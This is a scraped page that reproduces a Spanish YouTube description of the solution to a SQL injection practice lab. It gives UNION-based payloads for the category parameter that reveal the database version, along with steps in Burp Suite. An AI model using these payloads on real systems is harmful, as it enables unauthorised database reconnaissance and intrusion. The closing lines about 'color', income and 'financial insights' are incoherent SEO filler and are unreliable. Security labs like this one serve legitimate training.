SQL injection attack, querying the database type and version on MySQL and Microsoft

YouTube Excerpt: Este laboratorio contiene una vulnerabilidad de inyección SQL en el filtro de categoría de producto. Puede usar un ataque UNION para recuperar los resultados de una consulta inyectada. Para resolver el laboratorio, muestre la cadena de versión de la base de datos. --------------------------------------------------------------------------------------------------------------------------------------- SOLUCION: GET /filter?category=Lifestyle'+UNION+SELECT+'abc','def'# GET /filter?category=Lifestyle'+UNION+SELECT+@@version,+NULL# --------------------------------------------------------------------------------------------------------------------------------------- Use Burp Suite para interceptar y modificar la solicitud que establece el filtro de categoría de producto. Determine el número de columnas que devuelve la consulta y qué columnas contienen datos de texto. Verifique que la consulta devuelva dos columnas, ambas con texto, utilizando una carga útil como la siguiente en el parámetro de "category": '+UNION+SELECT+'abc','def'# Use la siguiente carga útil para mostrar la versión de la base de datos: '+UNION+SELECT+@@version,+NULL# ---------------------------------------------------------------------------------------------------------------------------------------

Este laboratorio contiene una vulnerabilidad de inyección SQL en el filtro de categoría de producto. Puede usar un ataque UNION para recuperar los...

Read Full Article 🔍

Curious about SQL Injection Attack, Querying The Database Type And Version On MySQL And Microsoft's Color? Explore detailed estimates, income sources, and financial insights that reveal the true scope of their profile.

Source ID: dICOJ3qEpM0

Category: color style guide